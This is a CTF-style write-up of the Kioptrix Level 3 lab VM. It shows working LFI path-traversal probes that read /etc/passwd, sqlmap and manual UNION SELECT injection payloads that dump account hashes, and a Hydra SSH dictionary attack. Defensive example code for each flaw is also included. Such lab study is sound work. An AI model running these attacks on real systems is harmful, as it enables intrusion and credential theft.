
Kioptrix Level 3 Writeup

Kioptrix level 3 vulnerable machine from vulnhub.

Kioptrix level 3 vulnhub link below:
Kioptrix Level 3 download page

1. Enumeration


A port scan reveals that only SSH and HTTP are open.

nmap -T4 -sV -A -oA nmapscan 192.168.0.71
Nmap scan report for UNKNOWN (192.168.0.71)
Host is up (0.0051s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)


1.1 SSH

The SSH version does not appear to have any known vulnerabilities. However, SSH could still have weak credentials.

1.2.1 HTTP


Dirb and Nikto are run in the background to check for any interesting pages or vulnerabilities. Dirb reveals that there is an accessible phpmyadmin page. It accepts a login with the username root and any random string as the password. However, this did not really reveal anything, as the default login has no privileges.

The login page reveals that it is powered by lotus.


[Image: Kioptrix level 3 lotus login]

Using searchsploit, a vulnerability is found:
[Image: Kioptrix level 2 lotus vuln]

This is a remote command execution vulnerability with a Metasploit module, which can be used to get a meterpreter shell on the target. Finding this exploit was too easy. However, there are several other vulnerabilities on this machine.

1.2.2 HTTP - LFI


The URL appears to include files based on a parameter, so it could be vulnerable to LFI.

http://192.168.0.71/index.php?system=Blog

Appending ../../../../../etc/passwd to the system parameter reveals nothing. However, with some research, the OWASP 'Testing for LFI' page shows that when using PHP, a null byte terminator at the end of the file name will bypass the check. When using the following:

http://vulnerable_host/preview.php?file=../../../../etc/passwd%00jpg

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
...............
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

This shows the passwd contents, which give usernames that can be used for brute forcing SSH. loneferret and dreg are the two user accounts, and a dictionary attack can be run against them over SSH.

More info from OWASP here: OWASP LFI testing
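To make the null byte behaviour concrete from the defender's side, the following is an added example (not code from the original writeup): a naive resolver that mimics include($name . ".php") on a runtime that drops everything after a NUL, next to a hardened resolver that rejects the probes shown above. PAGES_DIR, the allowlist and the function names are assumptions for illustration.

```python
# Added example, not from the original writeup: how the system= include parameter
# behaves under the vulnerable pattern versus a hardened resolver. PAGES_DIR, the
# allowlist and the function names are assumptions for illustration.
import posixpath as pp
from urllib.parse import unquote

PAGES_DIR = "/var/www/pages"                     # assumed location of the includable pages
ALLOWED_PAGES = {"Blog", "Gallery", "Contact"}   # constructed allowlist

def naive_resolve(name: str) -> str:
    """Mimics include($name . ".php") on a runtime whose file API treats the
    path as a C string: everything after a NUL byte is silently dropped."""
    return pp.normpath(pp.join(PAGES_DIR, name + ".php")).split("\x00")[0]

class IncludeError(ValueError):
    pass

def safe_resolve(name: str) -> str:
    """Resolve an include request or raise IncludeError.

    Rejects embedded NUL bytes (the %00 trick), anything that is not a plain
    page name, names outside the allowlist, and as a last line of defence any
    path that does not stay inside PAGES_DIR."""
    if "\x00" in name:
        raise IncludeError("null byte in include name")
    if not name.isalnum():
        raise IncludeError("illegal characters in include name")
    if name not in ALLOWED_PAGES:
        raise IncludeError("unknown page")
    path = pp.normpath(pp.join(PAGES_DIR, name + ".php"))
    if pp.commonpath([PAGES_DIR, path]) != PAGES_DIR:
        raise IncludeError("path escapes pages directory")
    return path

def handle_request(raw_param: str) -> str:
    """Decode the raw query value as the web server would, then resolve it.
    Returns the path, or a string starting with 'rejected:'."""
    try:
        return safe_resolve(unquote(raw_param))
    except IncludeError as exc:
        return f"rejected: {exc}"

if __name__ == "__main__":
    for probe in ("Blog", "../../../../etc/passwd", "../../../../etc/passwd%00jpg"):
        print(probe, "->", naive_resolve(unquote(probe)), "|", handle_request(probe))
```

Note that the naive resolver turns the first probe into /etc/passwd.php (which is why it "reveals nothing") and the %00 probe into /etc/passwd, while the hardened resolver rejects both before touching the filesystem.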

1.2.3 HTTP - sqlmap (Easy SQL Injection)


When browsing the website, the gallery page has a button to filter by an ID. This appears to be a way of retrieving data from the SQL database. Appending a ' to the ID produces an SQL error, which is good news: the page is vulnerable to SQL injection. SQLmap is then used to check for the databases:

sqlmap -u http://192.168.0.71/gallery/gallery.php\?id\= --dbs

available databases [3]:

gallery
information_schema
mysql


Three databases were revealed above. The gallery database probably holds the images and users of the gallery, so it can be searched next.

sqlmap -u http://192.168.0.71/gallery/gallery.php\?id\= -D gallery --tables

Database: gallery
[7 tables]
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+


The dev_accounts table is worth investigating: it could contain dev accounts... duh.

sqlmap -u http://192.168.0.71/gallery/gallery.php\?id\= -D gallery -T dev_accounts --dump

Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+


The dev_accounts dump contains 2 usernames and 2 hashes, which sqlmap cracked easily (the cleartext is shown in brackets).

1.2.4 HTTP - SQLI (without sqlmap)


Checking the number of columns using ORDER BY, then confirming with a UNION SELECT of six values:
id=2 union select 1,2,3,4,5,6

Finding the databases and tables using UNION SELECT against information_schema.tables. This shows the database gallery:
id=2 UNION SELECT 1, table_schema, table_name,4,5,6 FROM information_schema.tables--

Searching inside the database gallery:
id=1 UNION SELECT 1, table_name,3,4,5,6 FROM information_schema.tables WHERE table_schema = 'gallery'#

The gallery database contains the dev_accounts table. dev_accounts can then be searched for its columns:
id=1 UNION SELECT 1, column_name,3,4,5,6 FROM information_schema.columns WHERE table_name = 'dev_accounts'#

The columns reveal the 2 user accounts and their corresponding hashes. The hashes can then be cracked with John the Ripper.
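The gallery.php id lookup rebuilt in sqlite3, as an added example that is not code from the original writeup or the Gallarific application: the vulnerable shape (id spliced into the SQL text) next to the parameterised fix, run against the same six-value UNION payload shape used above. The schema, rows and placeholder hash are constructed for illustration.

```python
# Added example, not from the original writeup: the gallery.php id lookup rebuilt
# in sqlite3, first with the id spliced into the SQL text (the vulnerable shape)
# and then bound as a parameter. Schema and rows are constructed for illustration.
import sqlite3

def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the gallery database; six photo columns so the
    six-value UNION SELECT from the writeup lines up."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE gallarific_photos(id, title, filename, "
                "description, views, uploaded)")
    con.execute("INSERT INTO gallarific_photos VALUES (1,'cat','cat.jpg','',3,'2011')")
    con.execute("INSERT INTO gallarific_photos VALUES (2,'dog','dog.jpg','',7,'2011')")
    con.execute("CREATE TABLE dev_accounts(id, username, password)")
    con.execute("INSERT INTO dev_accounts VALUES (1,'dreg','<hash placeholder>')")
    return con

def photo_by_id_vulnerable(con: sqlite3.Connection, raw_id: str) -> list:
    """The bug: whatever arrives in ?id= becomes part of the query text."""
    sql = "SELECT * FROM gallarific_photos WHERE id=" + raw_id
    return con.execute(sql).fetchall()

def photo_by_id_fixed(con: sqlite3.Connection, raw_id: str) -> list:
    """The fix: validate the type, then bind the value so it is never parsed as SQL."""
    try:
        photo_id = int(raw_id)
    except ValueError:
        return []                       # '2 UNION SELECT ...' is not an integer
    return con.execute("SELECT * FROM gallarific_photos WHERE id=?",
                       (photo_id,)).fetchall()

UNION_PAYLOAD = "2 UNION SELECT 1, username, password, 4, 5, 6 FROM dev_accounts"

def demo(payload: str = UNION_PAYLOAD) -> tuple:
    """Run the same payload through both versions; returns (leaked_rows, fixed_rows)."""
    con = build_db()
    return photo_by_id_vulnerable(con, payload), photo_by_id_fixed(con, payload)

if __name__ == "__main__":
    leaked, fixed = demo()
    print("vulnerable:", leaked)       # dev_accounts row rides along with the photo
    print("fixed:     ", fixed)        # empty: the payload never reaches SQL
```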

2.1 Exploitation - SSH


The usernames fetched from the LFI attack can be run against a dictionary.

hydra -t 6 -l loneferret -P 10k-most-common.txt 192.168.0.71 ssh
Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 10000 login tries (l:1/p:10000), ~2500 tries per task
[DATA] attacking ssh://192.168.0.71:22/
[STATUS] 52.00 tries/min, 52 tries in 00:01h, 9948 to do in 03:12h, 4 active
[22][ssh] host: 192.168.0.71   login: loneferret   password: starwars
1 of 1 target successfully completed, 1 valid password found


The dictionary attack with Hydra above was successful and revealed the password starwars. Logging in to SSH with this username and password succeeds. While browsing files I found a configuration file in the gallery directory containing the MySQL login: the user is root and the password is fuckeyou. This gives full root access to the database.
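A run like the Hydra one above leaves a dense trail in the target's sshd log. The following is an added example (not from the original writeup) of the detection logic a defender would run over auth.log: a sliding window of failures per source and user, with a second alert when a success follows the burst. The log lines, hostname, source address and thresholds are constructed.

```python
# Added example, not from the original writeup: brute-force detection over sshd
# log lines of the kind a Hydra run like the one above leaves in auth.log. The
# log lines, hostname, source address and thresholds are constructed.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(\w{3} \d\d \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) \S+ for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+")

def parse(line: str):
    """Return (timestamp, result, user, source) or None for lines we do not track."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("2023 " + m.group(1), "%Y %b %d %H:%M:%S")  # syslog has no year
    return ts, m.group(2), m.group(3), m.group(4)

def detect(lines, threshold: int = 10, window_s: int = 60) -> list:
    """Alert on `threshold` failures per (source, user) inside `window_s`, and again
    if that source then logs in successfully while failures are still in the window."""
    alerts = []
    recent = defaultdict(deque)          # (source, user) -> timestamps of failures
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, result, user, src = parsed
        q = recent[(src, user)]
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()                  # slide the window forward
        if result == "Failed":
            q.append(ts)
            if len(q) == threshold:
                alerts.append(f"burst: {threshold} failures for {user} from {src} in {window_s}s")
        elif q:
            alerts.append(f"success after {len(q)} failures: {user} from {src}")
    return alerts

def sample_log() -> list:
    """Constructed lines: a dozen failures a second apart (Hydra ran at roughly
    52 tries/min), then the real password lands."""
    t0 = datetime(2023, 4, 1, 12, 0, 0)
    fmt = "%b %d %H:%M:%S"
    lines = [f"{(t0 + timedelta(seconds=i)).strftime(fmt)} kioptrix3 sshd[{2000 + i}]: "
             f"Failed password for loneferret from 192.168.0.50 port {40000 + i} ssh2"
             for i in range(12)]
    lines.append(f"{(t0 + timedelta(seconds=12)).strftime(fmt)} kioptrix3 sshd[2012]: "
                 "Accepted password for loneferret from 192.168.0.50 port 40012 ssh2")
    return lines
```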

Pwned!